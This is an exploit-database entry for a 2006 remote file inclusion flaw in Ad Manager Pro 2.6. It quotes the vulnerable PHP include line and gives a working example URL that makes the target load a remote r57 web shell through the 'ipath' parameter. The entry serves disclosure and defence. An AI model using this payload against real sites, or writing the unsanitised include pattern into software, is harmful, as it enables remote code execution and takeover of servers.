Lucene search

K
exploitdbBastiEDB-ID:1923
HistoryJun 17, 2006 - 12:00 a.m.

Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion

2006-06-1700:00:00
Basti
www.exploit-db.com
19

AI Score

7.4

Confidence

Low

Ad Manager Pro 2.6 Remote File Include Vulnerability

homepage: phpwebscripts.com

Affected files: ad.php and common.php

Credit: Basti

Vulnerable Code:
if ($ipath) include($ipath.'/common.php'); else include('./common.php');

Example:
http://[site]/admanagerpro/common.php?ipath=http://site/r57.txt?

# milw0rm.com [2006-06-17]

AI Score

7.4

Confidence

Low

Related for EDB-ID:1923